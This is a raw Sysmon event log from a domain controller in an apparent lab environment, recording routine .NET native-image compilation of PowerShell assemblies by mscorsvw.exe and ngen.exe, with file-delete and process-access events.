AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XG0GUKB207\Microsoft.PowerShell.ConsoleHost.ni.dll.auxMD5=723DB5D96F5A9211C7DFF508AF6A82DE,SHA256=06DA2E3AAE36E73EF6D4102472CBB1AE612ED11C6C610139EC230236B79518E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.730{4DB9351A-A276-60D3-5B05-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XG0GUKB207\Microsoft.PowerShell.ConsoleHost.ni.dllMD5=EDA4DE9BF082A471530275229C19883B,SHA256=F51A2B7BCBC1E68921F27320809E4C711F97C6BBD719DD3B6985D567853EFDA5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.699{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5B05-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A276-60D3-5A05-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4H4Z51IQOL\Microsoft.PowerShell.Commands.Utility.ni.dll.auxMD5=7AE9589D99555849B8548CDA0FADBFCB,SHA256=1F627E95A112CB9D709B3720AD576C15A79D8903B15CC3DE9201EA613C1378B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.683{4DB9351A-A276-60D3-5A05-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4H4Z51IQOL\Microsoft.PowerShell.Commands.Utility.ni.dllMD5=3181EF5D740D582668B2EAFCCFCDFB84,SHA256=BC756400E98A1D29CA5AFF7BCD672D01F94B94F4B0B128264FBE52EDC2157088,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.511{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69A0C19699145AA56E1A241F8051F74E,SHA256=6CD37DC6F1CAB98F82C6544390A4BACF4D8E7801E8D57AF882DCE3AB048D71C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.199{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5A05-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.183{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5A05-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.183{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5A05-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.183{4DB9351A-A276-60D3-5905-00000000CF01}4412NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IFHQ24Y9LA\Microsoft.PowerShell.Commands.Management.ni.dll.auxMD5=3390E3D550AE651D3E0DFFF266960D70,SHA256=C57F772728DA9178DC92F92052CC9649ABF164619CCE1CA039573F7389CE1221,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.183{4DB9351A-A276-60D3-5905-00000000CF01}4412NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IFHQ24Y9LA\Microsoft.PowerShell.Commands.Management.ni.dllMD5=BE8B084721C07B822F33AD1132E948AD,SHA256=A2757A977BA4A23352BDB52E6F88F23B40A9CD900488112037BCF68CA3FFDF3E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.043{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A276-60D3-5905-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A276-60D3-5905-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A276-60D3-5905-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.027{4DB9351A-A275-60D3-5805-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IBR89O4KH0\Microsoft.PowerShell.Commands.Diagnostics.ni.dll.auxMD5=BDA7131BBAACFA2FB186B531F64AB5BF,SHA256=7BE0FDF5BDB929E1A60430121C58A676C6F9881F2E82BEF5F825738C02EACFF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:02.027{4DB9351A-A275-60D3-5805-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IBR89O4KH0\Microsoft.PowerShell.Commands.Diagnostics.ni.dllMD5=B8D22411253C4692B1E42196C182C12D,SHA256=A5420D54DC44E442A5CB34A3143717F2226E7970588EF26B4B306E55AE90B54F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5805-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.980{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6705-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6705-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.964{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6705-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.964{4DB9351A-A277-60D3-6605-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0CH9HBCXZ6\Microsoft.PowerShell.Utility.Activities.ni.dll.auxMD5=9697B5CB77D46E5395CDD27FB8CD0D68,SHA256=763B2036BD29C437C4997CFE0CFD75DA97BE664B5F8C685AA64087D842057EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.949{4DB9351A-A277-60D3-6605-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0CH9HBCXZ6\Microsoft.PowerShell.Utility.Activities.ni.dllMD5=7B32EE1EB88AF07D305FB6D973B6D26C,SHA256=3AAA622DE3AE8E1C7567909CB6910ACC3B2883C061C656664831E7869D92D973,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.902{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6605-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.871{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6605-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.871{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-6605-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.871{4DB9351A-A277-60D3-6505-00000000CF01}3588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I80GH7QRBS\Microsoft.PowerShell.Security.Activities.ni.dll.auxMD5=E105B1C8F7CC93DCBECF92418B7A29B9,SHA256=D3792715465ED7912A21903E561B59CB4DF16E517BDEC23AA4384B06D6C56A2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.871{4DB9351A-A277-60D3-6505-00000000CF01}3588NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I80GH7QRBS\Microsoft.PowerShell.Security.Activities.ni.dllMD5=0CBF0233C869CA62DE6B245895FAECCA,SHA256=E1C668FB41C5799A3EA99A1B46906331B295699B89035CD857D0D90CDA6A704B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.839{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-6505-00000000CF01}3588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.824{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-6505-00000000CF01}3588C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 